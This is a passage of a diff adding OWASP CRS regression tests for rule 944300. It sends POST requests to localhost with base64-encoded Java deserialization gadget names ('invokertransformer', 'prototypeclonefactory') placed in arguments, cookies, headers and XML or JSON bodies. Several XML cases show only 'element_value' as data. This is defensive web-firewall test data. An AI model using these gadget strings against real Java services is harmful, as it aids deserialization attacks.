"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-205 + desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-206 + desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-207 + desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-208 + desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-209 + desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-210 + desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-211 + desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-212 + desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-213 + desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-214 + desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-215 + desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-216 + desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-217 + desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-218 + desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-219 + desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-220 + desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-221 + desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-222 + desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-223 + desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-224 + desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-225 + desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-226 + desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-227 + desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-228 + desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-229 + desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-230 + desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-231 + desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-232 + desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-233 + desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-234 + desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-235 + desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-236 + desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-237 + desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-238 + desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-239 + desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-240 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-241 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-242 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-243 + desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-244 + desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-245 + desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-246 + desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-247 + desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-248 + desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-249 + desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-250 + desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-251 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-252 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: 